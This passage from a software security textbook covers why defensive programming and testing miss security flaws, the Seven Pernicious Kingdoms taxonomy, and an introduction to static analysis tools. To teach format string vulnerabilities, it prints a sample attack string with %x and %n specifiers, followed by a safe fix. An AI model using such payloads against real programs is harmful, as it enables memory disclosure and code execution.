logError("attempt to print null message"); } else { fprintf(file, msg); } } From a security perspective, these checks simply do not go far enough. Although we have prevented a caller from crashing the program by providing null values, the code does not account for the fact that the value of the msg parameter itself might be malicious. By providing msg as the format string argument to fprintf(), the code leaves open the possibility that an attacker could specify a malicious format string designed to carry out a format string attack. (Chapter 6, “Buffer Overflow,” discusses format string vulnerabilities in detail.) If an attacker can slip in a message that looks something like this, the attacker could potentially take control of the program: AAA1_%08x.%08x.%08x.%08x.%08x.%n This attempt at defensive programming shows how a straightforward approach to solving a programming problem can turn out to be insecure. The people who created the programming languages, libraries, frameworks, protocols, and conventions that most programmers build upon did not anticipate all the ways their creations would be assailed. Because of a 6 Chapter 1 The Software Security Problem design oversight, format strings became an attack vector, and seemingly reasonable attempts at error handling turn out to be inadequate in the face of attack. A security-conscious programmer will deprive an attacker of the opportunity this vulnerability represents by supplying a fixed format string. void printMsg(FILE* file, char* msg) { if (file == NULL) { logError("attempt to print message to null file"); } else if (msg == NULL) { logError("attempt to print null message"); } else { fprintf(file, "%.128s", msg); } } In considering the range of things that might go wrong with a piece of code, programmers tend to stick with their experience: The program might crash, it might loop forever, or it might simply fail to produce the desired result. All of these failure modes are important, but preventing them does not lead to software that stands up to attack. Historically, programmers have not been trained to consider the interests or capabilities of an adversary. This results in code that might be well defended against the types of problems that a programmer is familiar with but that is still easy for an attacker to subvert. 1.2 Security Features != Secure Features Sometimes programmers do think about security, but more often than not, they think in terms of security features such as cryptographic ciphers, passwords, and access control mechanisms. As Michael Howard, a program manager on the Microsoft Security Engineering Team, says, “Security features != Secure features” [Howard and LeBlanc, 2002]. For a program to be secure, all portions of the program must be secure, not just the bits that explicitly address security. In many cases, security failings are not related to security features at all. A security feature can fail and jeopardize system security in plenty of ways, but there are usually many more ways in which defective nonsecurity features can go wrong and lead to a security problem. 1.2 Security Features != Secure Features 7 Security features are (usually) implemented with the idea that they must function correctly to maintain system security, but nonsecurity features often fail to receive this same consideration, even though they are often just as critical to the system's security. Programmers get this wrong all the time; as a consequence, they stop thinking about security when they need to be focusing on it. Consider this misguided quote from BEA’s documentation for WebLogic [BEA, 2004]: Since most security for Web applications can be implemented by a system administrator, application developers need not pay attention to the details of securing the application unless there are special considerations that must be addressed in the code. For programming custom security into an application, WebLogic Server application developers can take advantage of BEA-supplied Application Programming Interfaces (APIs) for obtaining information about subjects and principals (identifying information for users) that are used by WebLogic Server. The APIs are found in the package. Imagine a burglar who wants to break into your house. He might start by walking up to the front door and trying to turn the doorknob. If the door is locked, he has run into a security feature. Now imagine that the door’s hinges are on the outside of the house. The builder probably didn’t think about the hinge in relation to security; the hinges are by no means a security feature—they are present so that the door will meet the “easy to open and close” requirement. But now it’s unlikely that our burglar will spend time trying to pick the lock or pry open the door. He’ll simply lift out the hinge bolts and remove the door. Home builders stopped making this mistake long ago, but in the world of software security, this sort of goof-up still happens on a remarkably regular basis. Consider the list of high-profile vulnerabilities in image display software over the last five years, shown in Table 1.1. In all cases, the code that contained the vulnerability was related to image processing, not to security, but the effects of these vulnerabilities range from denial of service to complete system compromise. 8 Chapter 1 The Software Security Problem Table 1.1 Vulnerabilities in image display code over the last five years. All are significant vulnerabilities. None have anything to do with security features. Date Program Effect Reference March zLib 2002 Denial of service affecting many programs, including those that display or manipulate PNG files. bid/6431 November Internet 2002 Explorer Malicious PNG file can be used to execute arbitrary code when displayed in Internet Explorer. technet/security/bulletin/ MS02-066.mspx August 2004 libPNG Denial of service affecting users of Firefox, Opera, Safari, and many other programs. bid/6431 September MS GDI+ 2004 JPG-rendering code that enables the remote execution of arbitrary code. Affects Internet Explorer, Microsoft Office, and other Microsoft products. technet/security/bulletin/ MS04-028.mspx July zLib 2005 Creates the potential for remote code execution. Affects many programs, including those that display or manipulate PNG files. bid/14162 December 2005 Windows Graphics Rendering Engine Rendering of WMF files enables remote code execution of arbitrary code. Exploitable through Internet Explorer. technet/security/bulletin/ ms06-001.mspx January 2007 Java 2 Platform Rendering of GIF image allows the remote execution of arbitrary code through a hostile applet. search/ 1-26-102760-1 1.3 The Quality Fallacy 9 Instead of discussing ways to implement security features or make use of prepackaged security modules or frameworks, we concentrate on identifying and avoiding common mistakes in code that are not necessarily related to any security feature. We occasionally discuss security features, but only in the context of common implementation errors. 1.3 The Quality Fallacy Anyone who has ever written a program knows that mistakes are inevitable. Anyone who writes software professionally knows that producing good software requires a systematic approach to finding bugs. By far the most widely used approach to bug finding is dynamic testing, which involves running the software and comparing its output against an expected result. Advocates of extreme programming want to see a lot of small tests (unit tests) written by the programmer even before the code is written. Large software organizations have big groups of dedicated QA engineers who are responsible for nothing other than writing tests, running tests, and evaluating test results. If you’ve always thought of security as just another facet of software quality, you might be surprised to learn that it is almost impossible to improve software security merely by improving quality assurance. In practice, most software quality efforts are geared toward testing program functionality. The purpose is to find the bugs that will affect the most users in the worst ways. Functionality testing works well for making sure that typical users with typical needs will be happy, but it just won’t work for finding security defects that aren’t related to security features. Most software testing is aimed at comparing the implementation to the requirements, and this approach is inadequate for finding security problems. The software (the implementation) has a list of things it’s supposed to do (the requirements). Imagine testing a piece of software by running down the list of requirements and making sure the implementation fulfills each one. If the software fails to meet a particular requirement, you’ve found a bug. This works well for testing software functionality, even security functionality, but it will miss many security problems because security problems are often not violations of the requirements. Instead, security problems are frequently “unintended functionality” that causes the program to be insecure. Whittaker and Thomson describe it with the diagram in Figure 1.1 [Whittaker and Thompson, 2003]. 10 Requirements Chapter 1 The Software Security Problem Implementation bugs security problems Figure 1.1 Testing to make sure that the implementation includes the features described in the specification will miss many security problems. Ivan Arce, CTO of Core Security Technologies, put it like this: Reliable software does what it is supposed to do. Secure software does what it is supposed to do, and nothing else. The following JSP fragment demonstrates this phenomenon. (This bit of code is from Foundations of AJAX [Asleson and Schutta, 2005].) The code accepts an HTTP parameter and echoes it back to the browser. Hello ${}! This code might meet the program’s requirements, but it also enables a cross-site scripting attack because it will echo any string back to the browser, including a script written by an attacker. Because of this weakness, unsuspecting victims could click on a malicious link in an email message and subsequently give up their authentication credentials to an attacker. (See Chapter 9, “Web Applications,” for a complete discussion of cross-site scripting.) No amount of testing the intended functionality will reveal this problem. A growing number of organizations attempt to overcome the lack of focus on security by mandating a penetration test. After a system is built, testers stage a mock attack on the system. A black-box test gives the attackers no information about how the system is constructed. This might sound like a realistic scenario, but in reality, it is both inadequate and inefficient. Testing cannot begin until the system is complete, and testers have exclusive 1.4 Static Analysis in the Big Picture 11 access to the software only until the release date. After the release, attackers and defenders are on equal footing; attackers are now able to test and study the software, too. The narrow window means that the sum total of all attackers can easily have more hours to spend hunting for problems than the defenders have hours for testing. The testers eventually move on to other tasks, but attackers get to keep on trying. The end result of their greater investment is that attackers can find a greater number of vulnerabilities. Black-box testing tools try to automate some of the techniques applied by penetration testers by using precanned attacks. Because these tools use close to the same set of attacks against every program, they are able to find only defects that do not require much meaningful interaction with the software being tested. Failing such a test is a sign of real trouble, but passing doesn’t mean very much; it’s easy to pass a set of precanned tests. Another approach to testing, fuzzing, involves feeding the program randomly generated input [Miller, 2007]. Testing with purely random input tends to trigger the same conditions in the program again and again, which is inefficient. To improve efficiency, a fuzzer should skew the tests it generates based on knowledge about the program under test. If the fuzzer generates tests that resemble the file formats, protocols, or conventions used by the target program, it is more likely to put the program through its paces. Even with customization, fuzzing is a time-consuming process, and without proper iteration and refinement, the fuzzer is likely to spend most of its time exploring a shallow portion of the program’s state space. 1.4 Static Analysis in the Big Picture Most software development methodologies can be cast into some arrangement of the same four steps: 1. Plan—Gather requirements, create a design, and plan testing. 2. Build—Write the code and the tests. 3. Test—Run tests, record results, and determine the quality of the code. 4. Field—Deploy the software, monitor its performance, and maintain it as necessary. Different methodologies place a different amount of emphasis on each step, sometimes iterating through many cycles of a few steps or shrinking steps as a project matures, but all commonly practiced methodologies, including the waterfall model, the spiral model, extreme programming, and the Rational Unified Process, can be described in this four-step context. 12 Chapter 1 The Software Security Problem No matter what methodology is used, the only way to get security right is to incorporate security considerations into all the steps. Historically, the symptoms of bad software security have been treated as a field problem to be solved with firewalls, application firewalls, intrusion detection systems, and penetration testing. Figure 1.2 illustrates this late-inthe-game approach. The problem is, it doesn’t work. Instead, it creates a never-ending series of snafus and finger pointing. The right answer, illustrated in Figure 1.3, is to focus efforts on the cause of most software security problems: the way the software is constructed. Security needs to be an integral part of the way software is planned and built. (It should continue to be part of testing and fielding software, too, but with a diminished emphasis.) Plan Build Test Field Firewalls Intrusion Detection Systems Penetration Testing Figure 1.2 Treating the symptom: Focusing on security after the software is built is the wrong thing to do. Plan Build Test Field Static Source Code Analysis Architectural Risk Assessment Security Requirements Figure 1.3 Treating the cause: Focusing on security early, with activities centered on the way the software is built. 1.4 Static Analysis in the Big Picture 13 Gary McGraw estimates that roughly half of the mistakes that lead to security problems are implementation oversights, omissions, or misunderstandings [McGraw, 2006]. The format string and cross-site scripting problems we’ve already looked at both fall into this category. These are exactly the kinds of problems that a code review is good at flushing out. The down side is that, to find security problems during a code review, you have to be able to identify a security problem when you see one, and security mistakes can be subtle and easy to overlook even when you’re staring at them in the source code. This is where static analysis tools really shine. A static analysis tool can make the code review process faster and more fruitful by hypothesizing a set of potential problems for consideration during a code review. If half of security problems stem from the way the program is implemented, the other half are built into the design. The purpose of an architectural risk analysis is to make sure that, from a high level, the system is not designed in a manner that makes it inherently insecure. Design problems can be difficult or impossible to spot by looking at code. Instead, you need to examine the specification and design documents to find inconsistencies, bad assumptions, and other problems that could compromise security. For the most part, architectural risk analysis is a manual inspection process. Architectural risk analysis is useful not only for identifying design-level defects, but also for identifying and prioritizing the kinds of issues that need to be considered during code review. A program that is secure in one context might not be secure in another, so establishing the correct context for code review is important. For example, a program that is acceptable for a normal user could be a major security problem if run with administrator privileges. If a review of the design indicates that the program requires special privileges to run, the code review can look for ways in which those special privileges might be abused or misappropriated. In his book Software Security, McGraw lays out a set of seven touchpoints for integrating software security into software development [McGraw, 2006]. Code review with a tool is touchpoint number one. Michael Howard and Steve Lipner describe Microsoft’s security practices in their book The Security Development Lifecycle [Howard and Lipner, 2006]. Like McGraw, they advocate the use of tools for analyzing source code. Similarly, the CLASP Application Security Process calls for performing a source-level security review using automated analysis tools [CLASP, 2005]. No one claims that source code review is capable of identifying all problems, but the consensus is that source code review has a major part to play in any software security process. 14 Chapter 1 The Software Security Problem 1.5 Classifying Vulnerabilities In the course of our work, we look at a lot of vulnerable code. It is impossible to study vulnerabilities for very long without beginning to pick out patterns and relationships between the different types of mistakes that programmers make. From a high level, we divide defects into two loose groups: generic and context specific. A generic defect is a problem that can occur in almost any program written in the given language. A buffer overflow is an excellent example of a generic defect for C and C++ programs: A buffer overflow represents a security problem in almost any context, and many of the functions and code constructs that can lead to a buffer overflow are the same, regardless of the purpose of the program. (Chapters 6, "Buffer Overflow" and 7, “Bride of Buffer Overflow,” discuss buffer overflow defects in detail.) Finding context-specific defects, on the other hand, requires a specific knowledge about the semantics of the program at hand. Imagine a program that handles credit card numbers. To comply with the Payment Card Industry (PCI) Data Protection Standard, a program should never display a complete credit card number back to the user. Because there are no standard functions or data structures for storing or presenting credit card data, every program has its own way of doing things. Therefore, finding a problem with the credit card handling requires understanding the meaning of the functions and data structures defined by the program. In addition to the amount of context required to identify a defect, many defects can be found only in a particular representation of the program. Figure 1.4 examines the matrix formed by defect type and defect visibility. High-level problems such as wholesale granting of trust are often visible only in the program’s design, while implementation errors such as omitting input validation can often be found only by examining the program’s source code. Object-oriented languages such as Java have large class libraries, which make it possible to more easily understand the design by examining the source code. Classes derived from a standard library carry significant semantics with them, but even in the best of cases, it is not easy (or desirable) to reverse-engineer the design from the implementation. Security defects share enough common themes and patterns that it makes sense to define a nomenclature for describing them. People have been creating classification systems for security defects since at least the 1970s, but older classification efforts often fail to capture the salient relationships we see today. Over the last few years, we have seen a renewed 1.5 Classifying Vulnerabilities 15 Visible in the code Visible only in the design Generic defects Static analysis sweet spot. Built-in rules make it easy for tools to find these without programmer guidance. • Example: buffer overflow. Most likely to be found through architectural analysis. • Example: the program executes code downloaded as an email attachment. Context-specific defects Possible to find with static analysis, but customization may be required. • Example: mishandling of credit card information. Requires both understanding of general security principles along with domain-specific expertise. • Example: cryptographic keys kept in use for an unsafe duration. Figure 1.4 The best way to find a particular defect depends on whether it is generic or context specific, and whether it is visible in the code or only in the design. interest in this area. The Common Weakness Enumeration (CWE) project ( is building a formal list and a classification scheme for software weaknesses. The OWASP Honeycomb project ( is using a community-based approach to define terms and relationships between security principles, threats, attacks, vulnerabilities, and countermeasures. We prefer a simple organization that gives us just enough vocabulary to talk to programmers about the kinds of coding errors that are likely to lead to security problems. The Seven Pernicious Kingdoms Throughout the book, we refer to the Seven Pernicious Kingdoms, a taxonomy created by Tsipenyuk, Chess, and McGraw [Tsipenyuk, Chess, McGraw, 2005]. The term kingdom is used as biologists use it in their taxonomy of living organisms: to indicate a high-level grouping of similar members. The Seven Pernicious Kingdoms are listed here: 1. Input Validation and Representation 2. API Abuse 16 Chapter 1 The Software Security Problem 3. Security Features 4. Time and State 5. Error Handling 6. Code Quality 7. Encapsulation * Environment (Note that there are actually eight kingdoms, with the eighth referring to the influence of outside factors, such as the environment, on the code.) In our experience, this classification works well for describing both generic defects and context-specific defects. The ordering of kingdoms gives an estimate of their relative importance. McGraw discusses the Seven Pernicious Kingdoms in detail in Software Security [McGraw, 2006], and the complete taxonomy is available on the Web at; we include a brief overview here to lay out the terminology we use throughout the book. 1. Input Validation and Representation Input validation and representation problems are caused by metacharacters, alternate encodings, and numeric representations. Security problems result from trusting input. The issues include buffer overflow, cross-site scripting, SQL injection, and many others. Problems related to input validation and representation are the most prevalent and the most dangerous category of security defects in software today. As a consequence, Chapter 5, “Handling Input,” is dedicated solely to matters of handling input, and input validation and representation play a significant role in the discussion of buffer overflow (Chapters 6 and 7), the Web (Chapter 9), and XML and Web Services (Chapter 10, “XML and Web Services”). 2. API Abuse An API is a contract between a caller and a callee. The most common forms of API abuse are caused by the caller failing to honor its end of this contract. For example, if a program fails to call chdir() after calling chroot(), it violates the contract that specifies how to change the active root directory in a secure fashion. We discuss this and other APIs related to privilege management in Chapter 12, “Privileged Programs.” Another 1.5 Classifying Vulnerabilities 17 example of abuse is relying upon a DNS lookup function to return reliable identity information. In this case, the caller abuses the callee API by making an assumption about its behavior (that the return value can be used for authentication purposes). See Chapter 5 for more. The callercallee contract can also be violated from the other side. For example, if a Java class extends java.util.Random and returns nonrandom values, the contract is violated. (We discuss random numbers in Chapter 11, “Privacy and Secrets.”) 3. Security Features Even though software security is much more than just security features, it’s important to get the security features right. Here we’re concerned with topics such as authentication, access control, confidentiality, cryptography, and privilege management. Hard-coding a database password in source code is an example of a security feature (authentication) gone wrong. We look at problems related to managing these kinds of passwords in Chapter 11. Leaking confidential data between system users is another example (also discussed in Chapter 11). The topic of writing privileged programs gets a chapter of its own (Chapter 12). 4. Time and State To maintain their sanity, programmers like to think of their code as being executed in an orderly, uninterrupted, and linear fashion. Multitasking operating systems running on multicore, multi-CPU, or distributed machines don’t play by these rules—they juggle multiple users and multiple threads of control. Defects rush to fill the gap between the programmer’s model of how a program executes and what happens in reality. These defects are caused by unexpected interactions between threads, processes, time, and data. These interactions happen through shared state: semaphores, variables, the file system, and anything that can store information. Massively multiplayer online role-playing games (MMORPGs) such as World of Warcraft often contain time and state vulnerabilities because they allow hundreds or thousands of distributed users to interact simultaneously [Hoglund and McGraw, 2007]. The lag time between an event and the bookkeeping for the event sometimes leaves room for cheaters to duplicate gold pieces, cheat death, or otherwise gain an unfair advantage. Time and state is a topic throughout the book. For example, Chapter 5 points out that interrupts are input too, and Chapter 11 looks at race conditions in Java Servlets. 18 Chapter 1 The Software Security Problem 5. Error Handling Errors and error handling represent a class of API, but problems related to error handling are so common that they deserve a kingdom of their own. As with API abuse, there are two ways to introduce an errorrelated security vulnerability. The first (and most common) is to handle errors poorly or not at all. The second is to produce errors that either reveal too much or are difficult to handle safely. Chapter 8, “Errors and Exceptions,” focuses on the way error handling mishaps create ideal conditions for security problems. 6. Code Quality Poor code quality leads to unpredictable behavior. From a user’s perspective, this often manifests itself as poor usability. For an attacker, it provides an opportunity to stress the system in unexpected ways. Dereferencing a null pointer or entering an infinite loop could enable a denial-of-service attack, but it could also create the conditions necessary for an attacker to take advantage of some poorly thought-out error handling code. Good software security and good code quality are inexorably intertwined. 7. Encapsulation Encapsulation is about drawing strong boundaries. In a Web browser, that might mean ensuring that your mobile code cannot be abused by other mobile code. On the server, it might mean differentiation between validated data and unvalidated data (see the discussion of trust boundaries in Chapter 5), between one user’s data and another’s (privacy, discussed in Chapter 11), or between data that users are allowed to see and data that they are not (privilege, discussed in Chapter 12). * Environment This kingdom includes everything that is outside the source code but is still critical to the security of the product being created. Because the issues covered by this kingdom are not directly related to source code, we have separated it from the rest of the kingdoms. The configuration files that govern the program’s behavior and the compiler flags used to build the program are two examples of the environment influencing software security. Configuration comes up in our discussion of Web applications (Chapter 9) and Web Services (Chapter 10). 1.6 Summary 19 The Seven Pernicious Kingdoms vs. The OWASP Top 10 Table 1.2 shows the relationship between the Seven Pernicious Kingdoms and a popular list of vulnerabilities: the OWASP Top 10 [OWASP, 2004]. The Seven Pernicious Kingdoms encompass everything included in the OWASP Top 10, and the ranking of the OWASP categories largely follows the ordering of the Seven Kingdoms. Table 1.2 The Seven Pernicious Kingdoms in relation to the OWASP Top 10. Seven Pernicious Kingdoms 1. Input Validation and Representation 2. API Abuse 3. Security Features 4. Time and State 5. Error Handling 6. Code Quality 7. Encapsulation * Environment OWASP Top 10 1. Unvalidated Input 4. Cross-Site Scripting (XSS) Flaws 5. Buffer Overflows 6. Injection Flaws 2. Broken Access Control 3. Broken Authentication and Session Management 8. Insecure Storage 7. Improper Error Handling 9. Denial of Service 10. Insecure Configuration Management 1.6 Summary Getting security right requires understanding what can go wrong. By looking at a multitude of past security problems, we know that small coding errors can have a big impact on security. Often these problems are not related to any security feature, and there is no way to solve them by adding 20 Chapter 1 The Software Security Problem or altering security features. Techniques such as defensive programming that are aimed at creating more reliable software don’t solve the security problem, and neither does more extensive software testing or penetration testing. Achieving good software security requires taking security into account throughout the software development lifecycle. Different security methodologies emphasize different process steps, but all methodologies agree on one point: Developers need to examine source code to identify security-relevant defects. Static analysis can help identify problems that are visible in the code. Although just about any variety of mistake has the theoretical potential to cause a security problem, the kinds of errors that really do lead to security problems cluster around a small number of subjects. We refer to these subjects as the Seven Pernicious Kingdoms. We use terminology from the Seven Pernicious Kingdoms throughout the book to describe errors that lead to security problems. 2 Introduction to Static Analysis The refinement of techniques for the prompt discovery of error serves as well as any other as a hallmark of what we mean by science. —J. Robert Oppenheimer This chapter is about static analysis tools: what they are, what they’re good for, and what their limitations are. Any tool that analyzes code without executing it is performing static analysis. For the purpose of detecting security problems, the variety of static analysis tools we are most interested in are the ones that behave a bit like a spell checker; they prevent well-understood varieties of mistakes from going unnoticed. Even good spellers use a spell checker because, invariably, spelling mistakes creep in no matter how good a speller you are. A spell checker won’t catch every slip-up: If you type mute when you mean moot, a spell checker won’t help. Static analysis tools are the same way. A clean run doesn’t guarantee that your code is perfect; it merely indicates that it is free of certain kinds of common problems. Most practiced and professional writers find a spell checker to be a useful tool. Poor writers benefit from using a spell checker too, but the tool does not transform them into excellent writers! The same goes for static analysis: Good programmers can leverage static analysis tools to excellent effect, but bad programmers will still produce bad programs regardless of the tools they use. Our focus is on static analysis tools that identify security defects, but we begin by looking at the range of problems that static analysis can help solve. Later in the chapter, we look at the fundamental problems that make static analysis difficult from both a theoretical standpoint and a practical standpoint, and explore the trade-offs that tools make to meet their objectives. 21 22 Chapter 2 Introduction to Static Analysis 2.1 Capabilities and Limitations of Static Analysis Security problems can result from the same kind of simple mistakes that lead a good speller to occasionally make a typo: a little bit of confusion, a momentary lapse, or a temporary disconnect between the brain and the keyboard. But security problems can also grow out of a lack of understanding about what secure programming entails. It is not unusual for programmers to be completely unaware of some of the ways that attackers will try to take advantage of a piece of code. With that in mind, static analysis is well suited to identifying security problems for a number of reasons: • Static analysis tools apply checks thoroughly and consistently, without any of the bias that a programmer might have about which pieces of code are “interesting” from a security perspective or which pieces of code are easy to exercise through dynamic testing. Ever asked someone to proofread your work and had them point out an obvious problem that you completely overlooked? Was your brain automatically translating the words on the page into the words you intended to write? Then you know how valuable an unbiased analysis can be. • By examining the code itself, static analysis tools can often point to the root cause of a security problem, not just one of its symptoms. This is particularly important for making sure that vulnerabilities are fixed properly. More than once, we’ve heard the story where the security team reports: “The program contains a buffer overflow. We know it contains a buffer overflow because when we feed it the letter a 50 times in a row, it crashes.” Only later does the security team find out that the program has been fixed by checking to see if the input consists of exactly the letter a 50 times in a row. • Static analysis can find errors early in development, even before the program is run for the first time. Finding an error early not only reduces the cost of fixing the error, but the quick feedback cycle can help guide a programmer’s work: A programmer has the opportunity to correct mistakes he or she wasn’t previously aware could even happen. The attack scenarios and information about code constructs used by a static analysis tool act as a means of knowledge transfer. 2.1 Capabilities and Limitations of Static Analysis 23 • When a security researcher discovers a new variety of attack, static analysis tools make it easy to recheck a large body of code to see where the new attack might succeed. Some security defects exist in software for years before they are discovered, which makes the ability to review legacy code for newly discovered types of defects invaluable. The most common complaint leveled against static analysis tools that target security is that they produce too much noise. Specifically, they produce too many false positives, also known as false alarms. In this context, a false positive is a problem reported in a program when no problem actually exists. A large number of false positives can cause real difficulties. Not only does wading through a long list of false positives feel a little like serving latrine duty, but a programmer who has to look through a long list of false positives might overlook important results that are buried in the list. False positives are certainly undesirable, but from a security perspective, false negatives are much worse. With a false negative, a problem exists in the program, but the tool does not report it. The penalty for a false positive is the amount of time wasted while reviewing the result. The penalty for a false negative is far greater. Not only do you pay the price associated with having a vulnerability in your code, but you live with a false sense of security stemming from the fact that the tool made it appear that everything was okay. All static analysis tools are guaranteed to produce some false positives or some false negatives. Most produce both. We discuss the reasons why later in this chapter. The balance a tool strikes between false positives and false negatives is often indicative of the purpose of the tool. The right balance is quite different for static analysis tools that are meant to detect garden-variety bugs and static analysis tools that specifically target security-relevant defects. The cost of missing a garden-variety bug is, relatively speaking, small—multiple techniques and processes can be applied to make sure that the most important bugs are caught. For this reason, code quality tools usually attempt to produce a low number of false positives and are more willing to accept false negatives. Security is a different story. The penalty for overlooked security bugs is high, so security tools usually produce more false positives to minimize false negatives. For a static analysis tool to catch a defect, the defect must be visible in the code. This might seem like an obvious point, but it is important to understand that architectural risk analysis is a necessary compliment to static analysis. Although some elements of a design have an explicit representation 24 Chapter 2 Introduction to Static Analysis in the program (a hard-coded protocol identifier, for example), in many cases, it is hard to derive the design given only the implementation. 2.2 Solving Problems with Static Analysis Static analysis is used more widely than many people realize, partially because there are many kinds of static analysis tools, each with different goals. In this section, we take a look at some of the different categories of static analysis tools, referring to commercial vendors and open source projects where appropriate, and show where security tools fit in. We cover: • Type checking • Style checking • Program understanding • Program verification • Property checking • Bug finding • Security review Type Checking The most widely used form of static analysis, and the one that most programmers are familiar with, is type checking. Many programmers don’t give type checking much thought. After all, the rules of the game are typically defined by the programming language and enforced by the compiler, so a programmer gets little say in when the analysis is performed or how the analysis works. Type checking is static analysis nonetheless. Type checking eliminates entire categories of programming mistakes. For example, it prevents programmers from accidentally assigning integral values to object variables. By catching errors at compile time, type checking prevents runtime errors. Type checking is limited in its capacity to catch errors, though, and it suffers from false positives and false negatives just like all other static analysis techniques. Interestingly, programmers rarely complain about a type checker’s imperfections. The Java statements in Example 2.1 will not compile because it is never legal to assign an expression of type int to a variable of type short, even though the programmer’s intent is unambiguous. Example 2.2 shows the output from the Java compiler. This is an 2.2 Solving Problems with Static Analysis 25 example of a type-checking false positive. The problem can be fixed by introducing an explicit type cast, which is the programmer’s way of overriding the default type inference behavior. Example 2.1 A type-checking false positive: These Java statements do not meet type safety rules even though they are logically correct. 10 short s = 0; 11 int i = s; /* the type checker allows this */ 12 short r = i; /* false positive: this will cause a 13 type checking error at compile time */ Example 2.2 Output from the Java compiler demonstrating the type-checking false positive. $ javac possible loss of precision found : int required: short short r = i; /* false positive: this will cause a ^ 1 error Type checking suffers from false negatives, too. The Java statements in Example 2.3 will pass type checking and compile without a hitch, but will fail at runtime. Arrays in Java are covariant, meaning that the type checker allows an Object array variable to hold a reference to a String array (because the String class is derived from the Object class), but at runtime Java will not allow the String array to hold a reference to an object of type Object. The type checker doesn’t complain about the code in Example 2.3, but when the code runs, it throws an ArrayStoreException. This represents a type-checking false negative. Example 2.3 These Java statements meet type-checking rules but will fail at runtime. Object[] objs = new String[1]; objs[0] = new Object(); 26 Chapter 2 Introduction to Static Analysis Style Checking Style checkers are also static analysis tools. They generally enforce a pickier and more superficial set of rules than a type checker. Pure style checkers enforce rules related to whitespace, naming, deprecated functions, commenting, program structure, and the like. Because many programmers are fiercely attached to their own version of good style, most style checkers are quite flexible about the set of rules they enforce. The errors produced by style checkers often affect the readability and the maintainability of the code but do not indicate that a particular error will occur when the program runs. Over time, some compilers have implemented optional style checks. For example, gcc’s -Wall flag will cause the compiler to detect when a switch statement does not account for all possible values of an enumerated type. Example 2.4 shows a C function with a suspicious switch statement. Example 2.5 shows what gcc says about the function when -Wall is in effect. Example 2.4 A C function with a switch statement that does not account for all possible values of an enumerated type. 1 typedef enum { red, green, blue } Color; 2 3 char* getColorString(Color c) { 4 char* ret = NULL; 5 switch (c) { 6 case red: 7 printf("red"); 8} 9 return ret; 10 } Example 2.5 The output from gcc using the -Wall flag. enum.c:5: warning: enumeration value 'green' not handled in switch enum.c:5: warning: enumeration value 'blue' not handled in switch It can be difficult to adopt a style checker midway through a large programming project because different programmers likely have been adhering to somewhat different notions of the “correct” style. After a project has 2.2 Solving Problems with Static Analysis 27 begun, revisiting code purely to make adjustments to reduce output from the style checker will realize only marginal benefit and at the cost of great inconvenience. Going through a large body of code and correcting stylechecker warnings is a little like painting a wooden house that’s infested by termites. Style checking is easiest to adopt at the outset of a project. Many open source and commercial style checkers are available. By far the most famous is the venerable tool lint. Many of the checks originally performed by lint have been incorporated into the various warning levels offered by popular compilers, but the phrase lint-like has stuck around as a pejorative term for describing style checkers. For style checking Java, we like the open source program PMD ( because it makes it easy to choose the style rules you’d like to enforce and almost as easy to add your own rules. PMD also offers some rudimentary bug detection capability. Parasoft ( sells a combination bug finder/style checker for Java, C, and C++. Program Understanding Program understanding tools help users make sense of a large codebase. Integrated development environments (IDEs) always include at least some program understanding functionality. Simple examples include “find all uses of this method” and “find the declaration of this global variable.” More advanced analysis can support automatic program-refactoring features, such as renaming variables or splitting a single function into multiple functions. Higher-level program understanding tools try to help programmers gain insight into the way a program works. Some try to reverse-engineer information about the design of the program based on an analysis of the implementation, thereby giving the programmer a big-picture view of the program. This is particularly useful for programmers who need to make sense out of a large body of code that they did not write, but it is a poor substitute for the original design itself. The open source Fujaba tool suite ( fujaba/), pictured in Figure 2.1, enables a developer to move back and forth between UML diagrams and Java source code. In some cases, Fujaba can also infer design patterns from the source code it reads. CAST Systems ( focuses on cataloging and exploring large software systems. 28 Chapter 2 Introduction to Static Analysis Figure 2.1 Fujaba enables programmers to move back and forth between a UML view and source code. Fujaba has a reverse-engineering capability that allows it to read source code and identify a limited set of design patterns. Program Verification and Property Checking A program verification tool accepts a specification and a body of code and then attempts to prove that the code is a faithful implementation of the specification. If the specification is a complete description of everything the program should do, the program verification tool can perform equivalence checking to make sure that the code and the specification exactly match.1 1. Equivalence checking is not used much for software, but in the world of hardware design, where a circuit might go through a long series of complex transformations on its way to becoming a piece of silicon, equivalence checking is widely used to make sure that a transformed design remains true to the original design. 2.2 Solving Problems with Static Analysis 29 Rarely do programmers have a specification that is detailed enough that it can be used for equivalence checking, and the job of creating such a specification can end up being more work than writing the code, so this style of formal verification does not happen very often. Even more limiting is the fact that, historically, equivalence checking tools have not been able to process programs of any significant size. See the sidebar “Formal Verification and the Orange Book” for a 1980s attempt at pulling formal verification toward the mainstream. More commonly, verification tools check software against a partial specification that details only part of the behavior of a program. This endeavor sometimes goes by the name property checking. The majority of property checking tools work either by applying logical inference or by performing model checking. (We discuss analysis algorithms in more detail in Chapter 4.) Many property checking tools focus on temporal safety properties. A temporal safety property specifies an ordered sequence of events that a program must not carry out. An example of a temporal safety property is “a memory location should not be read after it is freed.” Most propertychecking tools enable programmers to write their own specifications to check program-specific properties. When a property checking tool discovers that the code might not match the specification, it traditionally explains its finding to the user by reporting a counterexample: a hypothetical event or sequence of events that takes place within the program that will lead to the property being violated. Example 2.6 gives a few C statements that contain a memory leak, and Example 2.7 shows how a property checking tool might go about reporting a violation of the property using a counterexample to tell the story of the leaking memory. Example 2.6 A memory leak. If the first call to malloc() succeeds and the second fails, the memory allocated in the first call is leaked. 1 inBuf = (char*) malloc(bufSz); 2 if (inBuf == NULL) 3 return -1; 4 outBuf = (char*) malloc(bufSz); 5 if (outBuf == NULL) 6 return -1; 30 Chapter 2 Introduction to Static Analysis Example 2.7 A counterexample from a property checking tool running against the code in Example 2.6. The sequence of events describes a way in which the program can violate the property “allocated memory should always be freed”. Violation of property "allocated memory should always be freed": line 2: inBuf != NULL line 5: outBuf == NULL line 6: function returns (-1) without freeing inBuf A property checking tool is said to be sound with respect to the specification if it will always report a problem if one exists. In other words, the tool will never suffer a false negative. Most tools that claim to be sound require that the program being evaluated meet certain conditions. Some disallow function pointers, while others disallow recursion or assume that two pointers never alias (point to the same memory location). Soundness is an important characteristic in an academic context, where anything less might garner the label “unprincipled.” But for large real-world bodies of code, it is almost impossible to meet the conditions stipulated by the tool, so the soundness guarantee is not meaningful. For this reason, soundness is rarely a requirement from a practitioner’s point of view. In striving for soundness or because of other complications, a property checking tool might produce false positives. In the case of a false positive, the counterexample will contain one or more events that could not actually take place. Example 2.8 gives a second counterexample for a memory leak. This time, the property checker has gone wrong; it does not understand that, by 